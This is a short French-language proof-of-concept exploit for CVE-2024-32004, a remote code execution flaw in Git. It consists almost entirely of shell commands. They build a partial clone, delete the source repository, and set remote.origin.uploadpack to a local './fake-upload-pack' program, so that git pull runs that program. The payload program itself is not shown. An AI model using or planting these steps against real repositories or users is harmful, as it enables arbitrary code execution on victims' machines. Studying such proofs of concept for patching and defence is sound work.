
Exploit de preuve de concept pour CVE-2024-32004, une vulnérabilité d'exécution de code à distance dans Git, démontrant l'exploitation via un filtre upload-pack malveillant.
git init tmp
git -C tmp config uploadpack.allowfilter 1
git clone --filter=blob:none --no-local --no-checkout tmp evil
rm -rf tmp
git -C evil config remote.origin.uploadpack "./fake-upload-pack"
git pull